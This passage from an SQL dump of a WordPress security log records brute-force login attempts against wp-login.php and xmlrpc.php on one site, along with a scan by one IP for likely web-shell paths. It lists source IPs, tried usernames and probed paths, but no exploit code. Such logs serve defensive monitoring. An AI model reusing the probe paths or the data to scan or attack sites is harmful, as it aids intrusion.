Qfr3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'admin',0,1664253801.7283,152,'J2vyBupE1xe3hMgKoFT8WSOi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'admin',0,1664253801.7602,152,'396FyxiOrjIEeZTgnvzRmQHu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.87.230.228',844621540,'admin',0,1664254159.9908,152,'GwcoXheVz5njZ4y8xdDk7E1B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('166.62.125.246',2789113334,'newd',0,1664254211.4039,7,'5G3M7fv02WOoxIwSzukgC4Xc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.186.35',3583556131,'joyce',0,1664254429.1291,152,'gTAQvsfeOdpRG5qFzbXoWxyh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.149',2090732693,'admin',0,1664254448.5623,152,'auPx03OHoZSwg2N1trEAKQF6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.174.216',2733747928,'admin',0,1664254479.6366,152,'PlHcpsS7ymLtuIj5xDWZifwF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'admin',0,1664254783.5887,152,'acz7UBrhyHWgDPd6XRb9t21C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.222.28.26',1474173978,'admin',0,1664254831.4885,152,'LdzhOQXIxg3GD5ubfsPycCoB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'admin',0,1664255868.4602,152,'jRIXqxYoHM8GEKAUzwhZ6Sdm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.156.240',908434672,'newd',0,1664256152.1906,7,'z8a3hLnuCxHQOIAGkNJ9mtpo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.105.215',2160552407,'',0,1664256152.7403,55,'ELUhRZWFP8rQlOBqmA0MYf14','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/index.php',0,19,0),('128.199.105.215',2160552407,'',0,1664256156.0530,55,'S5RcLPNegby0aFQodzYjq9Ah','','19|0|0|0|cteisys.com/wp-includes/SimplePie/index.php',0,19,0),('128.199.105.215',2160552407,'',0,1664256157.5162,55,'uwbtBoO5YrWjZNLJC6ETc8KR','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('128.199.105.215',2160552407,'',0,1664256158.6081,55,'5t0kyud3msebDi4A1OVqE9c2','','19|0|0|0|cteisys.com/wp-content/themes/pridmag/about.php',0,19,0),('128.199.105.215',2160552407,'',0,1664256161.2994,55,'mep1GEOHDBThXuaVWQNCILFz','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,19,0),('128.199.105.215',2160552407,'',0,1664256161.3025,10,'mep1GEOHDBThXuaVWQNCILFz','','707|0|0|0|cteisys.com/wp-content/themes/seotheme/about.php',0,707,0),('128.199.105.215',2160552407,'',0,1664256162.4816,100,'1RUhCGtHirkgmj0YXobL5nux','','13|0|0|0|cteisys.com/years.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256163.6536,100,'Qa9ulKsioCSAFJHPg4mz2kB7','','13|0|0|0|cteisys.com/css/index.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256165.6244,100,'E7F8c5SAQPBnvZdpmW26J3ML','','13|0|0|0|cteisys.com/css/contents.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256166.7090,100,'Iv0QMCecNmS7fWyVP4dkuFT8','','13|0|0|0|cteisys.com/contents.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256167.8041,100,'B7g6Oyb0mqMJxS9NFLWQ1iGc','','13|0|0|0|cteisys.com/css/load.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256168.9067,100,'3wCOoBT5fK7ncz9sq1LgN4Ib','','13|0|0|0|cteisys.com/votes.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256170.0119,100,'TAeHrNqI4KjGWua0UPfhzyw2','','13|0|0|0|cteisys.com/2index.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256171.1031,100,'lZH8Djf3nMGk9NvpgxS2hYWw','','13|0|0|0|cteisys.com/1index.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256172.2005,100,'Kob08yIkrY9vHnQetBVFAJpM','','13|0|0|0|cteisys.com/',0,13,0),('128.199.105.215',2160552407,'',0,1664256173.3787,100,'Tg5uYHGbNyzVfpF8iEq9Zchj','','13|0|0|0|cteisys.com/load.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256174.5405,100,'FHfV6YjtLad5rlveq4I9pQnk','','13|0|0|0|cteisys.com/admin.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256175.7128,100,'OPpgXtV6NWn2zjEQAeDBK0bR','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256176.8288,71,'nSfHua0FCBbMjXQ4R7kh21gI','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256176.8293,100,'nSfHua0FCBbMjXQ4R7kh21gI','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256178.0391,100,'5IZufwceg3OspjRxV6PtiUSK','','13|0|0|0|cteisys.com/css/votes.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256179.1131,100,'QX6PkIvV7uewORLdScD4UZTA','','13|0|0|0|cteisys.com/about.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256180.2370,100,'0x97PUAIDgheckyRwbq2o1Hj','','13|0|0|0|cteisys.com/radio.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256181.3318,100,'15TXEytxVpo6ZrHlLAW9i7Dh','','13|0|0|0|cteisys.com/wp-admin/js/widgets/radio.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256182.5165,100,'2Uh3oz76dQtLPuX8EAvSZ0sM','','13|0|0|0|cteisys.com/wp-admin/css/colors/radio.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256183.5864,100,'LulN2gCpc0TsWjX9xUHBfmr6','','13|0|0|0|cteisys.com/wp-content/themes/classic/inc/admin.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256184.6532,100,'8utXveYS5gEHTAs64obcFmzQ','','13|0|0|0|cteisys.com/wp-includes/rest-api/endpoints/radio.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256185.8566,100,'6uNPw9jJ5zUDSeiZhbdpLf7Q','','13|0|0|0|cteisys.com/wp-admin/wikindex.php',0,13,0),('128.199.105.215',2160552407,'',0,1664256187.0122,100,'510fgp7KtSRr9ojyTFxhPOqa','','13|0|0|0|cteisys.com/wp-content/plugins/core-engine/admin.php',0,13,0),('150.95.109.187',2522836411,'admin',0,1664256199.4772,152,'Z8jQzrTc9Dw6tGp74250Fmvk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.111.30.40',1735335464,'admin',0,1664256222.0061,152,'MU7I1uQzY9t0Zi6NbRF8Hmwp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.81.214.91',3226588763,'admin',0,1664256556.7377,152,'Di2WrkONHdYcoVZ6UfQ7mKvw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.247.212',1807022036,'admin',0,1664256919.3013,152,'9fH0LrVSFti3xJEvw7MngoTz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.119.122.23',1433893399,'admin',0,1664256919.4068,152,'x6qG10RglQAawpSLjt73WYoZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1664257085.1159,7,'2AYwSej1ipTLaD5nzkX3ZxOU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.225.63.143',3168878479,'',0,1664257213.3278,55,'gMa5zNP8pA7qBkyZfte4lSxh','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('34.68.97.70',574906694,'admin',0,1664257248.9799,152,'KoDIj4mT1YHbARwl29h5cfBN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.251.22',869464854,'admin',0,1664257574.9389,152,'0MEDXQ2xujwhC4eqtdnvVOo6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.112.72.51',3413133363,'admin',0,1664257574.9811,152,'JWRko3q7Q8NfpIwjcn9lUm5L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.214.231',1738135271,'admin',0,1664257883.4557,152,'9Yt5pFAgl7Gefm4uPELOxicD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('108.167.132.70',1822917702,'admin',0,1664257884.1496,152,'3Em0lAIP5RG6gFM47Jk8uSTZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.39.9',1137518345,'newd',0,1664258024.0638,7,'aBf7Z8lGYEkqmjQ9NdK625rc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.33.197.207',3558983119,'admin',0,1664258498.9669,152,'KsbAOntJWP8ypz9XraIfek5u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.243.26.114',1760762482,'admin',0,1664258498.9869,152,'g75nrxQBUihqyAdX0jIte4Hb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.108.205',2160553165,'admin',0,1664259728.7976,51,'SHlofsbpwNgXGBWEcPTJ53er','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.164.193.195',3164914115,'admin',0,1664259760.8599,51,'3481l6AQ5mihDSWONasUEePI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.168.125.241',3098050033,'newd',0,1664260326.9249,7,'Q6gxDNKkSXmYPrTF8sCUod3y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.139',2249438091,'joyce',0,1664260775.7138,152,'PHXB51gE7V6iJeFS8bondZGK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.47.206',861482958,'newd',0,1664260888.1176,7,'ATqcEHB6DdMG3i4QXeJYW0Sv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.105.232',866085352,'newd',0,1664260895.7549,7,'1uH5zmRy7bM3aGZ82cNUwDse','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.129.212.158',729928862,'newd',0,1664261536.9472,7,'tjLhyNKY6vHrzGwXcxpnk389','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1664261561.0218,7,'j0d58NR67Gg9tYwhVHmqMiDo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.75.65.218',575357402,'newd',0,1664261849.8735,7,'7Qzdop8acPW3JsNvZbxfThyu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.81.81.219',1599164891,'newd',0,1664262823.9056,7,'NZV6cds95v8JlHk7GuFACioe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.128.173.10',2323688714,'newd',0,1664263461.8504,7,'0ksvb8xzRuyQlq6wCSjrK4JA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.15.160.148',856662164,'newd',0,1664263525.0248,7,'3flYbc1XJ6QRS2GxgsU9ByvD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1664263768.1227,7,'tArhOqy98nYE3WDwZULjcH6B','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('134.19.179.147',2249438099,'joyce',0,1664264044.7629,152,'afb5B0Mw6KmyHChSEcTWPO9u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1664264119.1449,7,'iEK1WsJtNPTHvX8FheuS243q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.159.4.98',1738474594,'newd',0,1664264125.6612,7,'OCmnXGLEH0akvqBMfP35Sobw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.55.44.23',758590487,'newd',0,1664264738.9714,7,'9JsOGVyKk3YPmDvhBqtxoHR5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.228.23',2335958039,'newd',0,1664264791.5277,7,'nVJ65a4k3Ah7SCcs8g1j9YNw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1664264812.4506,7,'xpY5eZcyk1jK0ozHhDqaMbnQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('123.31.41.38',2065639718,'newd',0,1664265469.6907,7,'35VDvK4Z2uMFLocpylAhdWjz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664265492.9228,7,'XcJ2M6EYvqFyNPU1bopVusLe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('84.39.116.180',1411871924,'joyce',0,1664266830.2902,152,'At3WL6oNxic0VsF1MUKBvaYD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('122.17.148.164',2047972516,'newd',0,1664266831.6961,7,'VvEKyMWOuBcd6FPam47L3h0r','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.64.58',872366138,'newd',0,1664266898.7731,7,'FZABTWVdzjJrCPoqxEugneaM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.74.120.192',1732933824,'newd',0,1664267516.0031,7,'wHGlMjcF3xUtoDgb6LkQhpWv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1664267556.3837,7,'0MWxN9sLoG5AuvUSXb6RjZaP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.182.4.117',783680629,'newd',0,1664268210.2878,7,'jocahizCTR873O4UBJy5ZsFm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1664268210.9728,7,'nHiJhQpEFz3KYwS8PvtkeC2o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.70.98.118',2084987510,'newd',0,1664268909.3880,7,'L9ybIRwFn74ziCeorGxjNsA6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.68.228.235',860153067,'newd',0,1664268911.0696,7,'r9DXCSQjW0NdJtxKkzMEo4lO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664270275.0114,7,'cgkwMoVWuOrspldhLPz2aGHD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.76.135.117',223119221,'newd',0,1664270305.7076,7,'8mduf4qHtUSbDwhBY1QVWKNZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1664270978.9043,7,'Cws6PRfeYNInvz59hH0Vy8ir','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.140.67',2310573123,'newd',0,1664270990.8523,7,'h8SBDrvP4pa30qbj5zQNXm2F','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.56.160.61',1731764285,'newd',0,1664271671.3751,7,'jk58dUhwEzovJVFI2SLncgau','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('186.234.80.121',3135918201,'newd',0,1664271683.5402,7,'7mIvoyAWOkXuDiQTg8RYj93H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.186.163',3583556259,'joyce',0,1664271855.0476,152,'7Me1QYfG5o3cF04DkAPrbjim','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1664272350.6227,7,'5dD4vAYjfrl8NzBxeC601UiR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.166.98',2650121826,'newd',0,1664272378.7117,7,'UJCPK9kxitS3Ma7OclAuBowL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1664272568.2873,51,'eW45DBkw7S3aPMizFjGb2rtd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.138.195.19',3649749779,'joyce',0,1664274078.5584,152,'5EAKySHmfIZRs8ePBnbL43FC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.222.127.109',2094956397,'newd',0,1664274454.3665,7,'WNMzuli98jbP6fQZaS7xIOdT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664274463.5253,7,'LxIGrS1oOY69bpq5sXaJc24w','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.39.9',1137518345,'admin',0,1664274755.8567,51,'uSNDtVbyvKLTpQB4Gohn9WrF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.95.146.83',1432326739,'newd',0,1664275100.8281,7,'sRuhX5OC3tkaSKiJ9yxUBz1L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('177.222.54.214',2984130262,'newd',0,1664275118.6138,7,'AxZwb2hEQ35mIXy1eFNsnRSU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.56.99.136',2453169032,'admin',0,1664275724.8255,51,'yYHNgWx7GnukS3V8OjPM5L9A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.178.73',2160570953,'newd',0,1664275828.7945,7,'xzcyZREpCq1jsltLH3faoD2I','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.171',1868207787,'newd',0,1664275864.2091,7,'V1DreEcb2XMgq53Uynax9Pof','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.46.146.101',3324940901,'newd',0,1664277139.7841,152,'TU1ncE0XQdlOhJAPW98tB6uM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.239.161.138',351248778,'newd',0,1664277139.8820,152,'Ev3BynbarCuhwc0zDmpXAMPJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.239.23.107',1475286891,'newd',0,1664277139.8913,152,'y573UlrTFSmafYAeK48Vux02','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664277141.7745,152,'4FEKInqvDGL1xBHJR3VbrZTw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.136.79.233',3582480361,'newd',0,1664277146.3171,152,'I97BHZV58hDJ1oaRsKYuxzCN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('114.132.201.19',1921304851,'newd',0,1664277146.5225,152,'1skrt3z0DvLTi6aKx5mMunIh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664277146.8267,152,'7bRYg8mIWyOKeTuNw1d3kplv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.170.166.144',531277456,'newd',0,1664277149.5612,152,'Am43kqTsJuRYOnQeP5hVrSE7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.170',3110826154,'newd',0,1664277151.7520,152,'Gmfc9IxqTCezkM0AFbnyYa2V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.77.162',3642052002,'newd',0,1664277153.4440,152,'SG7WIf4mpdqVXrbQDTM1tLay','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.206.208',2261896912,'newd',0,1664277161.0316,152,'eEJpVHhOaIXgULTy6C4cDGm1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.222.243.149',1038021525,'newd',0,1664277197.5298,7,'egWtFI3U1jJLnVKhNivQqT98','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.43.127.191',1697349567,'newd',0,1664277280.3707,7,'2Gvj9NCy4oKsReYuzSZQfFh6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664277740.2433,51,'OG50IlmiN4KHyT3rLCYUqBwM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.210.66.35',533873187,'newd',0,1664277932.1976,7,'mIb9Pxn2S8cAQlygsVazJ3qR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664277946.9568,7,'NZHG2RTd4rsMJvaU7qW1KfXk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'admin',0,1664278656.0913,51,'7QPcBgCHsARuUjN6labi8tSo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('31.184.242.14',532214286,'newd',0,1664278658.6170,7,'PHhvmClobRtjx40NTsnwg6WU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664278672.9449,7,'KXudL9mGMknEHT5Vt8bw6IJc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1664279344.4135,7,'EVOj7hUmkAPMT4aF2LbY9fqB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664279346.0478,7,'wZ0raq5HXSixElk1Rf7nG4gV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.46.253',3515690749,'Joyce',0,1664279484.8833,51,'t8gd3kcCaQN2ZJ4P5rWuvIwX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'admin',0,1664279630.3984,51,'tUuekI5WGVy1i72xgMsHBRaF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.116.205.56',3648310584,'newd',0,1664280261.1561,152,'p3mjZB5Nx4RVe9IzkuQYfoWt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664280261.2071,152,'1svK9g7c3EyRXtON8iBpukAV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664280270.1941,152,'AWl6V0fJuyr5njNpiIMoDsOg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.94.61.21',392051989,'newd',0,1664280271.6123,152,'b3FYC0ktv7WwpIALcd4gEamP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664280271.7476,152,'KD8Eg9VirGFwoabl37YWxBLP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664280278.3916,152,'8w2q7ozlC9gjpvDxRZhWkOIG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664280293.8194,152,'VSvKe1WLpoRy9HFhmC5Z72GY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.136.79.233',3582480361,'newd',0,1664280294.6788,152,'jXnAzpSf9WQPJtMcUwFECRv7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.71.32.81',1078403153,'newd',0,1664280298.3775,152,'T8VBFIj41PvsGR96hK7eAroc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.225.235',3165053419,'newd',0,1664280624.1961,7,'9fLOvM7GdIw3grFNkasS6i2A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'wadminw',0,1664280885.7246,51,'z40YU2HdPKVpfvjCLrm9oF7s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.99.54.31',2808296991,'wadminw',0,1664280889.1372,51,'jIOoGZRDKqUXYTMpliLe02HE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'wwwadmin',0,1664281582.0899,51,'stjI3HwcLoefEuTzqyWSlBdP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1664281590.2198,7,'vam6o5g7nJx9D8bEF03WSTkH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('186.234.80.121',3135918201,'wwwadmin',0,1664281606.8680,51,'zG47c9trKL6OPo0lRnITD13s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664282137.0658,152,'IjzAglC8JFVquer6xhSfKNDR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664282137.0662,152,'gIShVqfQMy4RxKmoTUA0Jlse','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.60.255',2733653247,'newd',0,1664282137.0818,152,'728HNoYCazm3su0gr51VOkil','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.254.90.243',1761499891,'joyce',0,1664282140.7760,152,'9EdCKkPv2qrJVXRQ3cSayI08','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.101',3110826341,'newd',0,1664282159.7478,152,'S1cZ35UFsvPqaf49XtdDkpir','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664282169.5274,152,'2cH4aPfrDdNOnEIx58ZR3tYX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.123.60.24',3111861272,'newd',0,1664282176.6011,152,'N1M0uRDj5x2EOVnYQ9HtZBoa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664282177.3422,152,'cHvoVN74IAgXO2RhWnMJ83d6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.239.23.107',1475286891,'newd',0,1664282180.4694,152,'Qdh0lgI4LkS3TrWnGObP1CYE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'wadminw',0,1664282437.7279,152,'idmHrzuXIUGK2q7ZQgC9ajR5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.155.200',2731973576,'wadminw',0,1664282449.7737,152,'0QoNX5ahi2LlIKWywBcOd3fD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1664282571.2204,7,'Bmr7DdU0tzZIMRQOhFCeqvwV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.35.64.73',1730363465,'wwwadmin',0,1664282809.5562,152,'evXTb4AyfhjtMckFYnHaQo15','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'wwwadmin',0,1664282842.5313,152,'W4FYPbeDwSGixkVJl2tEB3zK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664283170.3051,152,'L5xJfKCeFwtDnbYk0z8WOSUG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664283184.6002,152,'k0ANXWU7tDMGTiaPvQmJrhw2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.183.112.162',1740075170,'newd',0,1664283185.2610,152,'TYSxf1M5zOF9Gd3BhZL7ygql','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('200.9.65.1',3356049665,'newd',0,1664283189.8550,152,'k3VQXUetqGwNLD9yOB5FMCT2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664283193.3576,152,'hKi2MyST7R8YtHuDjAZ1WbBF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.5.185',2067269049,'newd',0,1664283201.1321,152,'bxjB4v3FXhr7ERUa5LTcODSg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('200.9.65.1',3356049665,'newd',0,1664283205.0579,152,'dZai8GLM1k53wpzVHPn9NUmo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.96.248',3098042616,'newd',0,1664283209.1679,152,'E7dODxPSvejQWf93ks2VnUwX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.142.173.121',143568249,'newd',0,1664283571.9434,7,'HTcRQxw64Kdal1vf8YNh9yqO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.147.193',2671875009,'admin',0,1664285485.6533,152,'Sy5vTxGY8WrwU0hi3BE6AbJ4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.121.12',2680912140,'newd',0,1664285528.1877,7,'IhFSvzXa3rD07oMdBQPZVikw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.90.150.36',1868207652,'admin',0,1664285864.3073,152,'kX3MrWG4yNvlHUxwhpzeSKT7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'admin',0,1664285865.3112,152,'aH6xC7VFzStTgpY53D4MZGmf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.178.228.135',1152574599,'newd',0,1664286214.1771,152,'RxtNOyvwIChScFe0jGfXZAgP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.109.209.136',1735250312,'newd',0,1664286214.3923,152,'lkXFZra9OxBP07pLQ4KWMgjV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664286214.3969,152,'cmaM6XzripSJEwZC571YsPdy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664286221.8438,152,'fQzSKg0X1iJDctUFEHCTmyNV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664286232.5514,152,'IngSC5dRWkfXNAQxMZcvz1YF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664286242.1969,152,'Y92sdpReiMJBzbPKnZcLyrqA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664286256.2122,152,'l1cNuIiMtW5jQGUeCKrFoHfy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.153.249.218',2694445530,'newd',0